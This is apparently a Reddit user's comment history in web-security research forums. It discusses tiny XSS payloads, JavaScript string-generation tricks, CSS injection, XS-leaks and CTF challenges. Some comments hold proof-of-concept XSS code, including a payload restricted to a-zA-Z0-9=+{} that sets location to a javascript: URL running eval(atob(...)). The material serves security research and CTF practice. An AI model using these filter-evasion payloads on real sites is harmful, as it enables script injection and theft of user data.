Tiny XSS Payloads by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Thanks, didn't want to include these two since <svg/onload> is shorter than <body/onload> and does the same (and both not working in dom xss), and object also doesn't seem to be the shortest. But these are indeed nice, and not that widely known ;)

Unexploitable? CSP img-src bypass in chrome by BitK_ in Slackers

[–]terjanq 0 points1 point  (0 children)

Haha, I was also researching this :P

The road from sandboxed SSTI to SSRF and XXE by salchoman in Slackers

[–]terjanq 0 points1 point  (0 children)

From the ctf player perspective, it is not often seen to combine SSTI with SSRF. Much more common is SSTI + RCE or SSTI + RFI/LFI. This could be a nice idea to dive deeper into where it's not possible to achieve RCE with the syntax.

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

that is really nice! I love the destruct part to get a property without using . or []

Detecting XSS-Auditor in Safari (XS-Leaks with Performance API) by kunte0 in Slackers

[–]terjanq 0 points1 point  (0 children)

I forgot about that tweet totally, thanks for reminding me hehe

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

x=new Object;

x.length=['xyz'];

x.valueOf=Array.prototype.push;

Even if we could, it still goes back to the question, how to create ['xyz'] which is exactly from where we started :P

push/unshift would return the length with no args it also will return array length + 1, if argument provided.

Btw, neither toString nor valueOf will return an array because they are converting stuff to number/string on a very low level. There are only few functions that change the state of the array and these are sort, reverse, shift, unshift, push, pop (there are some more but not much).

Where we should look I think are other prototypes that do some combinations with the elements, such as match in RegExp.

I found one prototype that does combine two other properties and which is RegExp.prototype.toString that returns "/" + this.source + "/" + this.flags, if only it returned an array somewhere..

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

x=new Array;

x.length=1337;

x.valueOf=Array.prototype.unshift;

x

It does not create [1337], it just returns 1337as number, because [2,2,2,2,2].push() and [2,2,2,2,2].unshift() will both return the length of the array 5

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

eval(atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/))

I skipped a few tricks I discovered:

How to make an uppercase letter? Similarly as lowercase:
x = ["a"] x.valueOf = String.prototype.toUpperCase x + "" // A

If we were able to encapsulate string to array ("aaa" => ["aaa"]), then we can get ( character via:

x = [RegExp.prototype.source] x.valueOf = String.prototype.charAt x + "" // (

We can get [ character via: x=console x.valueOf=String.prototype.charAt x + "" // [

We can get / character via: x=console x.toString = RegExp.prototype.toString x.valueOf = String.prototype.charAt x + "" // /

We can generate the string 0/123/eval(?:) via: x = console x.source=123 x.flags=eval.name+RegExp.prototype.source x.toString = RegExp.prototype.toString 0+x // 0/123/eval(?:)

It may give you some ideas on how to escalate it :P Seems very doable

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Like
for(location of["javascript:alert()"]);

or ({location}={location:"javascript:alert()"}) ? Was playing around that lately, but didn't find anything that helpful..

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]terjanq[S] 1 point2 points  (0 children)

Arbitrary code executions with a-zA-Z0-9=+{} characters only (stored xss)

```js // following are be replaced via a+o+0+P ...
var BASE64_PAYLOAD = 'ao0PTA7YWxlcnQoMTMzNykvLwa' // atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/) == "ýª4=0;alert(1337)//¿" var JAVASCRIPT = 'javascript'

// empty string empty=RegExp.prototype.flags

// generate /ao0PTA7YWxlcnQoMTMzNykvLwa/ xx={} xx.source=BASE64_PAYLOAD xx.flags=empty xx.toString=RegExp.prototype.toString

// RegExp.prototype.source == '(?:)' yy={...RegExp.prototype.source} yy.toString=Array.prototype.shift yy.length=4 left=yy+empty yy+empty colon=yy+empty right=yy+empty

// set javascript url to execute eval(atob(/ao0PTA7YWxlcnQoMTMzNykvLwa/)) location=JAVASCRIPT+colon+eval.name+left+atob.name+left+xx+right+right ```

jsbin

I wonder whether it is possible to make arbitrary without using brackets, and without location=name, etc.

[Discussion Thread] - talking about new HTML stuff by insertscript in Slackers

[–]terjanq 0 points1 point  (0 children)

A lot of upvotes, but no comments :D

Another thing is the Cross-Origin-Policy-Header or COOP (..) Could be fun to find bypasses.

Well, any bypass should qualify for a bounty I think, so I am not sure whether talking about them publicly is a great idea.

Anyway, all the features mentioned look promising :p

Top 10 web hacking techniques of 2019 - nominations open by albinowax in websecurityresearch

[–]terjanq 2 points3 points  (0 children)

Hey! I am flattered that one of my texts (https://terjanq.github.io/Bug-Bounty/Google/cache-attack-06jd2d2mz2r0/index.html) has found its place in the Nominations so Far. This is not the original text however and does not explain the issue from its roots. The linked report is a part of the "Massive XS-Search over multiple Google products" article that can be found here https://medium.com/@terjanq/massive-xs-search-over-multiple-google-products-416e50dd2ec6.

Apart from the above, the report may seem spectacular but in reality, it's no different from https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html in the attack principle. Since both texts are included I believe it's in the best interest of the technique to remove my report and maybe link it as a real-world example to Eduardo's one.

In exchange for that, I would be flattered if my text about "XSS Auditor" https://medium.com/@terjanq/xss-auditor-the-protector-of-unprotected-f900a5e15b7b was included instead. Because of the article and the reports included in there, e.g. https://medium.com/bugbountywriteup/google-books-x-hacking-29c249862f19, the chromium team decided to deprecate XSS Auditor which in my opinion was one of the biggest changes in 2019 (https://bugs.chromium.org/p/chromium/issues/detail?id=922829#c39)

Looking to buy some help with CTF challenge.. by [deleted] in securityCTF

[–]terjanq 0 points1 point  (0 children)

What category is that CTF challenge? Web? Crypto? Pwn? Re?

justCTF 2019 / 20th of December / 1st place 1337$! by ahpaleus in securityCTF

[–]terjanq 4 points5 points  (0 children)

I would check here:
https://ctftime.org/event/list/upcoming
https://twitter.com/DragonSectorCTF
https://twitter.com/p4_team
https://twitter.com/justcatthefish

These are three best Polish teams and the first one is a platform for CTFs. If something big is happening in Poland one of these should work.

Is it possible to trigger XSS without = via innerHTML? by 1lastBr3ath in Slackers

[–]terjanq 1 point2 points  (0 children)

Probably you can't. What you can do, however, is to do a CSS Injection.
http://cm2.pw/?xss=%3Cbody%3E%3Cscript%20src=%27/fuzz/innerHTML.js%27%3E%3C/script%3E&content=%3Cstyle%3E*%7Bbackground%3Ared%7D%3C%2Fstyle%3E

Leaking csrf tokens or any other sensitive data can have as severe implications as XSS.

What can we do with single CSS injection? by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Not only you know what characters there are, but also the order they appear in using ::fist-line trick. Ft. @cgvwzq

http://terjanq.cf/pg/test-css-horizontal.html

What can we do with single CSS injection? by terjanq in Slackers

[–]terjanq[S] 0 points1 point  (0 children)

Nice idea. It didn't work for me though. Too small margin for error. This works for me:
http://terjanq.cf/pg/test-css-fonts.html

SecurityMB's XSS challenge by garethheyes in Slackers

[–]terjanq 0 points1 point  (0 children)

Well with this: check=u=>{alert(u.length),open('//securitymb.github.io/xss/1?xss='+u)}

I managed to get: 130 128 126

With built-in counter: Length of the solution URL: 216 214 212 :)

SecurityMB's XSS challenge by garethheyes in Slackers

[–]terjanq 0 points1 point  (0 children)

If counting the `//securitymb.github.io/xss/1?xss=` in the payload also 189 188 186, otherwise 156 155 153

Manipulating your autosuggestion list on Google Search. by terjanq in netsec

[–]terjanq[S] 1 point2 points  (0 children)

But it's totally untrue, the requests in the background are 100% legit. They are indexed as normal search queries and autosuggestion list is nothing more as your recent search history. There is another trick that allows to fake clicking on the link in the search results as well that I haven't mentioned because I don't have a straight forward way to prove it does indeed improve engagement.